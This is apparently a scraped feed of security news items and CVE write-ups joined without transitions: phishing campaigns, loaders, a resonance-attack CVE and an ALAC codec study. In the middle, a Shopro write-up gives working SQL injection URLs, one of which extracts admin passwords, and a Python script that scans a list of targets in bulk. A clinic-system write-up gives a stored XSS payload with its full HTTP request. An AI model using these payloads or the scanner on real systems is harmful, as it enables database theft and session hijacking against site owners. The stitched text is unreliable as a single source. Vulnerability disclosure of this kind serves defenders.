The cybercriminal crew has used 15 malware families to target travel and hospitality companies globally, constantly changing tactics over the course of its four-year history.

Another threat actor targeting hospitality, hotel, and travel organizations has re-emerged during the busy summer travel season: a smaller, financially motivated player named TA558.  

According to new research from Proofpoint, the group has been around since 2018 but is stepping up its attacks this year, targeting Portuguese and Spanish speakers located in Latin America, as well as targets in western Europe and North America.

Spanish, Portuguese, and occasional English-language emails use reservation-themed lures with business-relevant themes (such as hotel-room bookings) to distribute malicious attachments or URLs.

Proofpoint researchers have counted 15 different malware payloads, most frequently remote access Trojans (RATs), that can enable reconnaissance, data theft, and distribution of follow-on malware.

These malware families occasionally overlap with command-and-control (C2) domains, with the most frequently observed payloads including Loda, Vjw0rm, AsyncRAT, and Revenge RAT.

The report explains that in recent years, TA558 has shifted tactics, starting to use URLs and container files to distribute malware.

"TA558 began using URLs more frequently in 2022. TA558 conducted 27 campaigns with URLs in 2022, compared to just five campaigns total from 2018 through 2021," according to the report. "Typically, URLs led to container files such as ISOs or zip files containing executables."

Sherrod DeGrippo, vice president of threat research and detection at Proofpoint, explains this is likely in response to Microsoft announcing it would begin blocking VBA macros downloaded from the Internet by default.

"This actor is unique in that they have used the same lure themes, language, and targeting since Proofpoint first identified them in 2018," she tells Dark Reading.

However, she points out they often change tactics, techniques, and procedures (TTPs) and have used different malware payloads over the course of their activity.

"This suggests the actor is actively changing and responding to what works best or is most effective in achieving initial infection, using tactics and malware widely used by a variety of threat actors," she says.

She explains like many threat actors in the threat landscape, TA558 has pivoted away from macros in attachments to using other filetypes and URLs to distribute malware.

"It is likely other actors targeting these industries will use similar techniques that we described previously," she says.

Threat actors have pivoted away from macro-enabled documents attached directly to messages to deliver malware, increasingly using container files such as ISO and RAR attachments and Windows Shortcut (LNK) files.

DeGrippo says the increase in activity by TA558 this year is not indicative of an increase of activity targeting the travel/hospitality industries in general.

"However, organizations in these industries should be aware of the TTPs described in the report, and ensure employees are trained to identify and report phishing attempts when identified," she advises.

**Travel Industry in Threat Actor Crosshairs**

Attacks against travel-related websites began to rise months ago as the industry recovered from COVID-19, a July report from PerimeterX indicated, with competitive scraping-bot requests increasing dramatically in Europe and Asia.

As the coronavirus pandemic ebbs and consumers look to resume annual vacation plans, fraudsters are refocusing their efforts from financial services to the travel and leisure industries, according to TransUnion's latest quarterly analysis.

Multiple cybercrime groups have been spotted this year selling stolen credentials and other sensitive personal information pilfered from travel-related websites, with the methods of malicious actors evolving due to the concentration on personally identifiable information.

Summertime Blues: TA558 Ramps Up Attacks on Hospitality, Travel Sectors

Categories: Business
Tags: Janet Jackson

Tags:  music

Tags:  rhythm nation

Tags:  song

Tags:  video

Tags:  resonant frequency

Tags:  hard drive

We take a look at news of the Janet Jackson smash Rhythm Nation causing bizarre issues for certain older hard drive models.



(Read more...)




The post Bad rhythm: Janet Jackson song resonates poorly with some old hard drives appeared first on Malwarebytes Labs.

Janet Jackson’s Rhythm Nation music video would have caused quite the commotion back in the old Windows XP days. If you’re still running a certain model of an OEM hard drive from the Windows XP days, you may still be liable to experience the same thing today. However, said commotion was not solely down to the choreography or phenomenal beats.

Rythym Nation by Janet Jackson came with a peculiar quirk. That quirk involved crashing the hopes and dreams of the person watching it, along with their hard drive.

Microsoft writer Raymond Chen reveals the somewhat bizarre tale of Janet’s computer stomping abilities in a recent blog post.

**What was happening here?**

Back in the olden times, it turns out that specific flavours of hardware running Windows XP did not like Janet busting a move. Some different models of laptop, from competitors of the first brand, would also crash. Even more spectacularly: simply playing the song on one device could make a second device nearby crash.

Old style mechanical hard drives are slowly being replaced by SSD drives. You may find them being used by gamers for cheap and easy excess game storage, but the mechanical hard drive’s time in the sun is over.

Mechanical drives have a whole lot of vibration going on inside, and this is where the drives become vulnerable to very peculiar forms of frequency based risk. Indeed, using the resonant frequency of the drive itself to make it stop working properly is not a new concept. Low frequency noise was used in tests during 2018 to break CCTV and prevent a laptop’s operating system from working.

**Dancefloor devastation for your hard drive**

Janet, ever the innovator, was clearly one step ahead of security researchers. By chance, it turns out that Rhythm Nation matched a resonant frequency for the hard drive used in these particular types of laptop.If you run into a mechanical drive in a device these days, there’s a good chance it’ll be a 7,200 RPM drive (RPM is the number of revolutions the drive’s platter makes per minute). The drives struck here, smooth criminal style,were specific models clocking in at 5,400RPM.

Custom filters were added by manufacturers in the audio pipeline. These filters swung into action at the first sign of a Rhythm Nation intro and removed the frequencies as the audio played.

**A CVE: better late than never**

This rhythm-based tale of woe seemingly has no end. The Register noticed an entry on the list of Common Vulnerabilities and Exposures (CVEs), listed as CVE-2022-38392. From the description, surely Janet’s finest hour:

_A certain 5400 RPM OEM hard drive, as shipped with laptop PCs in approximately 2005, allows physically proximate attackers to cause a denial of service (device malfunction and system crash) via a resonant-frequency attack with the audio signal from the Rhythm Nation music video._

From further down the page, a rather relevant warning:

_Disclaimer: The record creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE._

As I close the lid on my 2005 Windows XP laptop for the last time, never a truer word was spoken.

Bad rhythm: Janet Jackson song resonates poorly with some old hard drives

The malware loader known as Bumblebee is being increasingly co-opted by threat actors associated with BazarLoader, TrickBot, and IcedID in their campaigns to breach target networks for post-exploitation activities.
"Bumblebee operators conduct intensive reconnaissance activities and redirect the output of executed commands to files for exfiltration," Cybereason researchers Meroujan Antonyan and

The malware loader known as Bumblebee is being increasingly co-opted by threat actors associated with BazarLoader, TrickBot, and IcedID in their campaigns to breach target networks for post-exploitation activities.

"Bumblebee operators conduct intensive reconnaissance activities and redirect the output of executed commands to files for exfiltration," Cybereason researchers Meroujan Antonyan and Alon Laufer said in a technical write-up.

Bumblebee first came to light in March 2022 when Google's Threat Analysis Group (TAG) unmasked the activities of an initial access broker dubbed Exotic Lily with ties to the TrickBot and the larger Conti collectives.

Typically delivered via initial access acquired through spear-phishing campaigns, the modus operandi has since been tweaked by eschewing macro-laced documents in favor of ISO and LNK files, primarily in response to Microsoft's decision to block macros by default.

"Distribution of the malware is done by phishing emails with an attachment or a link to a malicious archive containing Bumblebee," the researchers said. "The initial execution relies on the end-user execution which has to extract the archive, mount an ISO image file, and click a Windows shortcut (LNK) file."

The LNK file, for its part, contains the command to launch the Bumblebee loader, which is then used as a conduit for next-stage actions such as persistence, privilege escalation, reconnaissance, and credential theft.

Also employed during the attack is the Cobalt Strike adversary simulation framework upon gaining elevated privileges on infected endpoints, enabling the threat actor to laterally move across the network. Persistence is achieved by deploying AnyDesk remote desktop software.

In the incident analyzed by Cybereason, the stolen credentials of a highly privileged user were subsequently utilized to seize control of the Active Directory, not to mention create a local user account for data exfiltration.

"The time it took between initial access and Active Directory compromise was less than two days," the cybersecurity firm said. "Attacks involving Bumblebee must be treated as critical, \[...\] and this loader is known for ransomware delivery."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Hackers Using Bumblebee Loader to Compromise Active Directory Services

Shopro Mall System v1.3.8 was discovered to contain a SQL injection vulnerability via the value parameter.

**Shopro Mall system V1.3.8 Value parameter has SQL injection****Shopro Mall system**

Official Website：https://shopro.top Github：https://github.com/ITmonkey-cn/shopro.git 

**Search**

shodan：http.title:"shopro" fofa：title="shopro"

**Vulnerability Type**

Error-Based SQL Injection

**Vulnerability Version**

V1.3.8

**Recurring environment:**

*   ubuntu
*   python3.7

**Vulnerability Description AND recurrence**

1.  F12 find something interesting 
    
2.  parameter goods\_ids has sql error message 
    
        http://url/addons/shopro/goods/lists?page=1&goods_ids=32),updatexml(1,concat(0x7e,(select database()),0x7e),1)-- -
        
    
3.  Find information whit Error-Based SQL Injection 
    
        http://url/addons/shopro/goods/lists?page=1&goods_ids=32),updatexml(1,concat(0x7e,(select group_concat(password) from fa_admin),0x7e),1)-- -
        
    
4.  POC
    
        import requests
        requests.packages.urllib3.disable_warnings()
        def poc(url):
        	try:
        		payload = "/addons/shopro/goods/lists?page=1&goods_ids=32),updatexml(1,concat(0x7e,(select database()),0x7e),1)-- -"
        		target = url + payload
        		#print(url)
        		header = {'User-Agent':'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6'}
        		response = requests.get(target, headers=header, timeout=5,verify=False)
        		#print(response.status_code)
        		#print(response.text)
        		if response.status_code == 500 and "XPATH" in response.text:
        			print(url + " is vulnerable")
        	except Exception as e:
        		pass
        	else:
        		pass
        
        
        def main():
        	with open('url.txt',encoding='utf-8') as f:
        		for i in f.readlines():
        			poc( i.strip())
        		f.close()
        
        
        if __name__ == '__main__':	
        	main()

CVE-2022-35154: secf0ra11.github.io/Shopro_SQL_injection.md at main · secf0ra11/secf0ra11.github.io

FusionPBX 5.0.1 was discovered to contain a command injection vulnerability via /fax/fax_send.php.

@@ -312,7 +312,7 @@ function fax\_split\_dtmf(&$fax\_number, &$fax\_dtmf){ if ($fax\_file\_extension != "pdf" && $fax\_file\_extension != "tif") { chdir($dir\_fax\_temp); $command = $IS\_WINDOWS ? '' : 'export HOME=/tmp && '; $command .= 'libreoffice --headless --convert-to pdf --outdir '.$dir\_fax\_temp.' '.$dir\_fax\_temp.'/'.$fax\_name.'.'.$fax\_file\_extension; $command .= 'libreoffice --headless --convert-to pdf --outdir '.$dir\_fax\_temp.' '.$dir\_fax\_temp.'/'.escapeshellarg($fax\_name).'.'.escapeshellarg($fax\_file\_extension); exec($command); @unlink($dir\_fax\_temp.'/'.$fax\_name.'.'.$fax\_file\_extension); } @@ -322,7 +322,7 @@ function fax\_split\_dtmf(&$fax\_number, &$fax\_dtmf){ chdir($dir\_fax\_temp);  
//convert pdf to tif $cmd = exec('which gs')." -q -r".$gs\_r." -g".$gs\_g." -dBATCH -dPDFFitPage -dNOSAFER -dNOPAUSE -dBATCH -sOutputFile=".correct\_path($fax\_name).".tif -sDEVICE=tiffg4 -Ilib stocht.ps -c \\"{ .75 gt { 1 } { 0 } ifelse} settransfer\\" -- ".correct\_path($fax\_name).".pdf -c quit"; $cmd = exec('which gs')." -q -r".$gs\_r." -g".$gs\_g." -dBATCH -dPDFFitPage -dNOSAFER -dNOPAUSE -dBATCH -sOutputFile=".escapeshellarg($fax\_name).".tif -sDEVICE=tiffg4 -Ilib stocht.ps -c \\"{ .75 gt { 1 } { 0 } ifelse} settransfer\\" -- ".escapeshellarg($fax\_name).".pdf -c quit"; // echo($cmd . "<br/>\\n"); exec($cmd); @unlink($dir\_fax\_temp.'/'.$fax\_name.'.pdf'); @@ -672,17 +672,17 @@ function fax\_split\_dtmf(&$fax\_number, &$fax\_dtmf){  
//send the fax $fax\_file = $dir\_fax\_sent."/".$fax\_instance\_uuid.".tif"; $common\_variables .= "fax\_queue\_uuid='" . $fax\_queue\_uuid . "',"; $common\_variables .= "fax\_queue\_uuid='" . escapeshellarg($fax\_queue\_uuid) . "',"; $common\_variables = "for\_fax=1,"; $common\_variables .= "accountcode='" . $fax\_accountcode . "',"; $common\_variables .= "sip\_h\_X-accountcode='" . $fax\_accountcode . "',"; $common\_variables .= "domain\_uuid=" . $\_SESSION\["domain\_uuid"\] . ","; $common\_variables .= "domain\_name=" . $\_SESSION\["domain\_name"\] . ","; $common\_variables .= "origination\_caller\_id\_name='" . $fax\_caller\_id\_name . "',"; $common\_variables .= "origination\_caller\_id\_number='" . $fax\_caller\_id\_number . "',"; $common\_variables .= "fax\_ident='" . $fax\_caller\_id\_number . "',"; $common\_variables .= "fax\_header='" . $fax\_caller\_id\_name . "',"; $common\_variables .= "fax\_file='" . $fax\_file . "',"; $common\_variables .= "accountcode='" . escapeshellarg($fax\_accountcode) . "',"; $common\_variables .= "sip\_h\_X-accountcode='" . escapeshellarg($fax\_accountcode) . "',"; $common\_variables .= "domain\_uuid=" . escapeshellarg($\_SESSION\["domain\_uuid"\]) . ","; $common\_variables .= "domain\_name=" . escapeshellarg($\_SESSION\["domain\_name"\]) . ","; $common\_variables .= "origination\_caller\_id\_name='" . escapeshellarg($fax\_caller\_id\_name) . "',"; $common\_variables .= "origination\_caller\_id\_number='" . escapeshellarg($fax\_caller\_id\_number) . "',"; $common\_variables .= "fax\_ident='" . escapeshellarg($fax\_caller\_id\_number) . "',"; $common\_variables .= "fax\_header='" . escapeshellarg($fax\_caller\_id\_name) . "',"; $common\_variables .= "fax\_file='" . escapeshellarg($fax\_file) . "',";  
foreach ($fax\_numbers as $fax\_number) {  
@@ -704,16 +704,16 @@ function fax\_split\_dtmf(&$fax\_number, &$fax\_dtmf){ $fax\_uri = $route\_array\[0\]; $fax\_variables = ""; foreach($\_SESSION\['fax'\]\['variable'\] as $variable) { $fax\_variables .= $variable.","; $fax\_variables .= escapeshellarg($variable).","; } }  
//build the fax dial string $dial\_string = $common\_variables; $dial\_string .= $fax\_variables; $dial\_string .= "mailto\_address='" . $mail\_to\_address . "',"; $dial\_string .= "mailfrom\_address='" . $mail\_from\_address . "',"; $dial\_string .= "fax\_uri=" . $fax\_uri . ","; $dial\_string .= "mailto\_address='" . escapeshellarg($mail\_to\_address) . "',"; $dial\_string .= "mailfrom\_address='" . escapeshellarg($mail\_from\_address) . "',"; $dial\_string .= "fax\_uri=" . escapeshellarg($fax\_uri) . ","; $dial\_string .= "fax\_retry\_attempts=1" . ","; $dial\_string .= "fax\_retry\_limit=20" . ","; $dial\_string .= "fax\_retry\_sleep=180" . ",";

CVE-2022-35153: Security use escapeshellarg · fusionpbx/fusionpbx@de22a91

The curated detection feature for Chronicle SecOps Suite provides security teams with actionable insights on cloud threats and Windows-based attacks from Google Cloud Threat Intelligence Team.

Organizations are increasingly relying on threat intelligence data to understand the sheer volume and complexity of security threats. On that note, Google Cloud has announced the general availability of the "curated detection" capability for its Chronicle security analysis platform to give organizations insights into the latest security threats.

The new feature, as part of the Chronicle SecOps Suite, pipes Google’s own threat intelligence data into an automated detection service that provides security teams with up-to-date insights on cloud threats -- such as attacks against cloud systems, attempts to exfiltrate data, and misconfigured systems -- and Windows-based attacks -- such as ransomware, remote-access tools, information stealers, data exfiltration, suspicious activity, and misconfigurations.

The service provides security teams with “high quality, actionable, out-of-the-box threat detection content curated, built, and maintained by the Google Cloud Threat Intelligence team," said Benjamin Chang, a Google Cloud software engineer. "By surfacing impactful, high-efficacy detections, Chronicle can enable analysts to spend time responding to actual threats and reduce alert fatigue."

The information from the detection service can be integrated with authoritative data sources, such as from the organization’s identity access management (IAM) systems and configuration management databases, to give security teams more context. Customers who used curated detections during public preview were able to detect malicious activity and take actions to prevent threats earlier in their life cycle, Chang said.

Microsoft provides similar capabilities via Microsoft Sentinel. Security teams are understaffed and overstressed, trying to keep up with an evolving threat landscape and managing the growing volume of alerts. Through these partnerships security teams have a shot at quickly identifying, investigating, and responding to threats.

Google Cloud Adds Curated Detection to Chronicle

In Sony Xperia series 1, 5, and Pro, an out of bound memory access can occur due to lack of validation of the number of frames being passed during music playback.

May 18, 2022

**Research by:** Slava Makkaveev, Netanel Ben Simon

**Introduction**

The Apple Lossless Audio Codec (ALAC) is an audio coding format developed by Apple Inc. in 2004 for lossless data compression of digital music. After initially keeping it proprietary, in late 2011 Apple made the codec open source. Since then, the ALAC format has been embedded in many non-Apple audio playback devices and programs, including Android-based smartphones, and Linux and Windows media players and converters.

The open source ALAC decoder contains serious vulnerabilities. Apple keeps updating the proprietary version of the decoder and fixing security issues, but the shared code has not been patched since 2011. Many third-party vendors use the Apple-supplied code as the basis for their own ALAC implementations, and it’s fair to assume that many of them do not maintain the external code.

We discovered that MediaTek and Qualcomm, the two largest mobile chipset makers, ported the vulnerable ALAC code into their audio decoders, which are used in more than half of all smartphones worldwide. The ALAC issues we found could be used by an attacker for RCE on a mobile device through a malformed audio file. In addition, an unprivileged Android app can use these vulnerabilities to escalate its privileges and gain access to media data and user conversations.

Our goal was not to find all the projects that integrate the ALAC decoder, but we easily found several popular Ubuntu packages in the Universe repository that are also based on the vulnerable ALAC code and can be targeted by an attacker for RCE on an Ubuntu machine.

In this study, we focus on mobile devices.

**OpenMAX Codecs**

Open Media Acceleration (OpenMAX or OMX) is the set of C-language programming interfaces that provides abstractions useful for multimedia processing.

On Android devices, the Stagefright media playback engine integrates OpenMAX to recognize and use custom hardware-based multimedia codecs.

**Figure 1:** OpenMAX in Android media.

While Android provides built-in software codecs for common media formats, a hardware manufacturer can add an OpenMAX codec to decode/encode a specific one.

All media codecs presented on the device are listed in the /vendor/etc/media_codecs.xml file. According to the OpenMax specification, the codec name and content type must be declared for each codec.

**Figure 2:** Built-in software codecs.

An OpenMAX codec is a dynamic library that implements the corresponding decoding/encoding logic. The relationship table between the codec name and the library name is built into the OpenMAX Core library /vendor/lib/libOmxCore.so. On MediaTek devices, the /vendor/etc/mtk_omx_core.cfg configuration file contains this table in text format.

**Figure 3:** Core configuration.

Both MediaTek and Qualcomm provide custom OpenMAX decoders for the ALAC format. The ALAC declaration is shown in Figure 4, where the first line refers to MediaTek devices and the second line to those belonging to Qualcomm.

**Figure 4:** ALAC decoder declaration.

/vendor/lib/libMtkOmxAlacDec.so is the OpenMAX ALAC library on MediaTek devices and /vendor/lib/libOmxAlacDecSw.so is the library on Qualcomm. Media service /vendor/bin/hw/[email protected] loads the ALAC library when requested by an Android app, and then calls it to decode the supplied frames.

A malicious .m4a audio file can be used to attack a device even when played in a safe app based on the Android media framework. In addition, a malicious app can use a harmful frame to attack the privileged [email protected] service.

**Requesting frame decoding from the app**

The Android framework provides the android.media.MediaCodec class to access low-level media codecs.

We can create the ALAC decoder by using its name.

The configure method can be used to tune the decoder. A Codec-specific Data (csd-0) array allows us to set the frame length and bit depth parameters that we want to control in order to exploit the vulnerabilities.

To pass an arbitrary frame to the decoder for processing:

The Android app does not require any permissions to initiate decoding. To attack the media service, all we need to do is to prepare a malformed frame that causes the vulnerability.

**The ALAC vulnerabilities****MediaTek**

A quick look at the libMtkOmxAlacDec.so library showed that it is more likely based on the Shairport source code than on the code published by Apple. In fact, both sources are quite similar and have the same security issues.

The MtkOmxAlacDec::InitAlacDecoder method is responsible for initializing the ALAC decoder based on the csd-0 information provided by the app or included in the audio file header. The method calls the alac_init function, which fills an internal object with the audio parameters and allocates working buffers to store the decoded data.

The setinfo_max_samples_per_frame field of the alac object is initialized with the frame length (the first DWORD of the csd-0), and the setinfo_sample_size field is initialized with the bit depth.

The frame length times 4 of the heap memory is allocated as the outputsamples_buffer_a buffer. No integer overflow check is performed. In the 32-bit media server, if the provided frame length is greater than or equal to 0x40000000, the wrong amount of memory is allocated.

The MtkOmxAlacDec::DecodeAudio method is responsible for decoding the audio frame. It calls the alac_decode_frame function passing the alac object, the decoding frame, and an output buffer for decoded data as arguments.

The variable outputsamples is the number of samples to decode. As you can see, it is initialized with the setinfo_max_samples_per_frame at the beginning of the function, which is the maximum possible value of samples per frame. However, this variable can be corrected by the actual number of samples, the value of which is encoded in the frame itself. There are no validations associated with the outputsamples, so an invalid number could be provided. For example, in the frame in Figure 5, the number of samples is 0x41414141.

**Figure 5:** Malformed ALAC frame.

Several code snippets like the one shown below are implemented in the alac_decode_frame function to decode the frame data.

As you can see, outputsamples \* setinfo_sample_size bits are decoded from the input frame into the outputsamples_buffer_a buffer, the size of which is setinfo_max_samples_per_frame \* 4. We control all the involved values: the outputsamples, the setinfo_sample_size, the setinfo_max_samples_per_frame, and the decoding content.

For a heap data leak, we set the outputsamples and the setinfo_max_samples_per_frame to be larger than the input frame. In this case, the contents of the heap after the frame buffer are “decoded” to the outputsamples_buffer_a, which is then copied to the output buffer.

To overwrite the heap, we set the setinfo_max_samples_per_frame to be smaller than the input frame. In this case, the data is decoded outside the outputsamples_buffer_a buffer as determined by what we set in the outputsamples.

In Figure 6, you can see the crash dump caused by the malformed frame shown in Figure 5. The test device is the Xiaomi Redmi Note 9T 5G (MediaTek MT6853 Dimensity 800U 5G chipset) with MIUI Global 12.5.2.0 OS.

**Figure 6:** Crash dump of MediaTek’s ALAC decoder.

All of the described vulnerabilities can be exploited as they provide both read and write primitives.

**Qualcomm**

The ALAC decoder implemented by Qualcomm has exactly the same issues as the MediaTek’s decoder.

The OpenMAX libOmxAlacDecSw.so library is a wrapper over the libAlacSwDec.so, which is based on the source code shared by Apple.

The ALACDecoder::Init method allocates the mMixBufferU buffer to store the decoded data. The buffer size is 4 times the frame length specified in the csd-0 and controlled by the attacker.

The ALACDecoder::Decode method decodes ALAC frames. Again, there is no verification of the number of samples provided in the frame.

Depending on the numSamples and the size of the input frame, the mMixBufferU buffer can be overflowed with the input frame or filled with leaked data.

In Figure 7, you can see the crash dump of Qualcomm’s ALAC decoder. The test device is the Sony Xperia XZ Premium.

**Figure 7:** Crash dump of Qualcomm’s ALAC decoder.

**Conclusion**

We discovered several vulnerabilities in the Apple lossless audio codec that are relevant for smartphones with MediaTek and Qualcomm chipsets. Two thirds of all smartphones sold in 2021 are vulnerable.

The issues we found could be used by an attacker for RCE on a mobile device via a malicious audio file, or for LPE from an unprivileged Android application. The attacker could gain access to user conversations and stored media.

MediaTek assigned CVE-2021-0674 and CVE-2021-0675 to the ALAC issues. The vulnerabilities were already fixed and published in the December 2021 MediaTek Security Bulletin. Qualcomm released the patch for CVE-2021-30351 in the December 2021 Qualcomm Security Bulletin.

Check Point’s customers _remain fully protected_ against such threats while using Harmony Mobile Security.

CVE-2022-23747: #ALHACK: One codec to hack the whole world - Check Point Research

The high-severity security vulnerability (CVE-2022-2856) is due to improper user-input validation.

A zero-day security vulnerability in Google's Chrome browser is being actively exploited in the wild.

The Internet behemoth released 11 security patches for Chrome this week, which are now being pushed out in stages to those with automatic updates enabled for Windows, Mac, and Linux; however, everyone can manually update now.

The zero-day (CVE-2022-2856) is rated as high severity and involves “insufficient validation of untrusted input in Intents,” according to Google's advisory.

Intents, where the bug resides, are used by Chrome to process user input; if the browser doesn't validate this input properly, an attacker is able to specially craft an input (say, a post in the comments section of a website) that's not expected by the application.

"This will lead to parts of the system receiving unintended input, which may result in altered control flow, arbitrary control of a resource, or arbitrary code execution," according to MITRE.

Other details of the bug are scant — Google usually restricts details until a quorum of users have applied the updates.

Still, “Google is aware that an exploit for CVE-2022-2856 exists in the wild,” reads the alert, so users should patch now.

This is the fifth actively exploited zero-day vulnerability disclosed in Chrome in 2022. The previous four were: CVE-2022-0609 (February), CVE-2022-1096 (March), CVE-2022-1364 (April), and CVE-2022-2294 (July).

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Google Chrome Zero-Day Found Exploited in the Wild

The stealthy crypter, active since 2015, has been used to deliver a wide range of information stealers and RATs at a rapid, widespread clip.

Researchers this week warned of a sophisticated, evasive crypter that several threat actors are using to distribute a range of information stealers and remote-access Trojans (RATs).

The crypter, dubbed "DarkTortilla," is pervasive and persistent, and it packs multiple features designed to help it avoid anti-malware and forensics tools. The .NET-based crypter can be configured to deliver numerous malicious payloads, and can potentially be used to plant illegal content on a victim's system. It's also capable of tricking both users and sandboxes into believing it is benign.

Researchers from Secureworks, who first spotted DarkTortilla last October, believe it has been active since at least August 2015. Rob Pantazopoulos, senior security researcher at Secureworks' Counter Threat Unit (CTU), says threat actors have used DarkTortilla in the past to deliver a wide range of other malware, including Remcos, BitRat, FormBook, WarzoneRat, Snake Keylogger, LokiBot, QuasarRat, NetWire, and DCRat. On a few occasions, the crypter has also been used in targeted attacks to deliver payloads such as Metaspolit and Cobalt Strike.

Most recently, it's been used mainly to deliver malware such as the RATs AgentTesla, NanoCore, and AsyncRat, as well as the information-stealer RedLine.

Somewhat unusually for such a widely used malware distributor, there have been just nine instances where a threat actor used DarkTortilla to distribute ransomware — and seven of those involved the Babuk ransomware family.

**Pervasive and Versatile**

"DarkTortilla first came into focus for Secureworks in October 2021 when we detected a threat actor leveraging a Microsoft Exchange remote code execution vulnerability (CVE-2021-34473) to execute malicious PowerShell within customer environments," Pantazopoulos says. "The attack chain eventually led to the download and execution of the .NET malware that we now call DarkTortilla."

Secureworks researchers said that between January 2021 through May, they spotted an average of 93 unique DarkTortilla samples being uploaded to VirusTotal every week. The security vendor says it has counted more than 10,000 unique DarkTortilla samples since it began tracking the malware. Like many malware tools, attackers have been using spam emails with file attachments such as .ISO, .ZIP, and .IMG to distribute DarkTortilla. In some instances, they have also used malicious documents to deliver the malware.

**Highly Configurable**

What makes DarkTortilla dangerous is its high degree of configurability and the various anti-analysis and anti-tampering controls it packs to make detection and analysis highly challenging. The malware, for instance, uses open source tools such as DeepSea and ConfuserEX to obfuscate its code, and its main payload gets executed entirely in memory, Pantazopoulos says.

Also, DarkTortilla's initial loader, which is the only component of the malware that touches the file system, contains minimal functionality, making it hard to spot.

"Its only job is to retrieve, decode, and load the core processor, which is typically stored as encrypted data within the initial loader's resources," he notes. The code itself is generic in nature and tends to vary between samples depending on the obfuscation tools that have been applied. As a result, Secureworks has only been able to identify a handful of consistent markers for the malware — which too are likely to change soon, the researcher says.

The security vendor's analysis of DarkTortilla showed that it migrates execution to the Windows %TEMP% directory during initial execution, a feature that Pantazopoulos says is troublesome for defenders. One benefit in doing this — from the attacker's perspective — is that it allows DarkTortilla to hide on an infected system.

"Second, if the %Delay% configuration element is defined within the DarkTortilla configuration, the amount of time from when DarkTortilla is run to when the main payload gets executed increases exponentially," he says. For instance, with just a few configuration changes, attackers can set the malware to execute its main payload several minutes after the DarkTortilla executable is run.

"The impact here is that, when defenders submit the sample to most popular sandboxes, the sample will likely timeout without doing anything malicious and the sandbox may report that the sample was benign."

**Bag of Tricks**

DarkTortilla's bag of tricks includes a message box that attackers can use to display customizable, fake messages about the malware being a legitimate application, about the execution failing, or about the software being corrupted. The goal here, again, is to trick users into believing the malware that is executing on their system is benign.

"From a features perspective, we find DarkTortilla's ability to deliver numerous additional payloads in the form of 'addons' to be very interesting," Pantazopoulos notes. In one instance, the configured addon was a benign decoy Excel spreadsheet that opened as the malware was executing in the background. In another instance, Secureworks discovered the configured addon was a legitimate application installer that ran when the malware was executing. Thus the victim assumed they were installing a legitimate application.

In a handful of instances, Secureworks observed threat actors using DarkTortilla to drop addons to disk that were then not run later. Of the more than 600 DarkTortilla addons that Secureworks has observed so far, only seven were dropped to disk and not executed.

The file types ranged from executables and configuration files to PDF documents and were typically dropped to the victim's My Documents folder. "Though we've yet to see it used this way, it is very possible that a threat actor could leverage DarkTortilla to plant illegal content on a victim's file system without their knowledge," Pantazopoulos says.

'DarkTortilla' Malware Wraps in Sophistication for High-Volume RAT Infections

Clinic's Patient Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via update_medicine_details.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Packing text box under the Update Medical Details module.

Permalink

Cannot retrieve contributors at this time

**Clinic's Patient Management System v1.0 by oretnom23 has xss vulnerability**

Author：hangZhaoYue

The password for the backend login account is: admin/admin123

Vulnerability details: There is a stored xss vulnerability in "update\_medicine\_details.php" of the Medicine Detaits module of the Medicines module in the background management system

vendors: https://www.sourcecodester.com/php-clinics-patient-management-system-source-code

Vulnerability File: pms/update\_medicine\_details.php

Vulnerability location: ip/pms/update\_medicine\_details.php?medicine\_id=1&medicine\_detail\_id=1&packing=,packing

\[+\] Payload: ip/pms/update\_medicine\_details.php?medicine\_id=1&medicine\_detail\_id=1&packing=<script>alert(/document.cookie/)</script> // Leak place ---> packing

POST /pms/update\_medicine\_details.php?medicine\_id\=1&medicine\_detail\_id\=1&packing\=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.19/pms/update\_medicine\_details.php?medicine\_id=1&medicine\_detail\_id=1&packing=%3Cscript%3Ealert(document.cookie)%3C/script%3E
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=0e9b9jpdjupmvl1dk6lq6dnmfe
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 92
hidden\_id=1&medicine=1&packing=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&submit=

1.  After we log in to the background, click on Medicines, then click on Medicines Details

2.  Pull to the bottom to see the editing function, click the edit on the first line

3.  Fill in our payload in the packing box (<script>alert(document.cookie)</script>),Click update to save

4.After clicking save, you can see that our payload is executed, and the cookie pops up

5.And also execute our payload when we access the Medicine Detaits of the Medicines module

Tag

#windows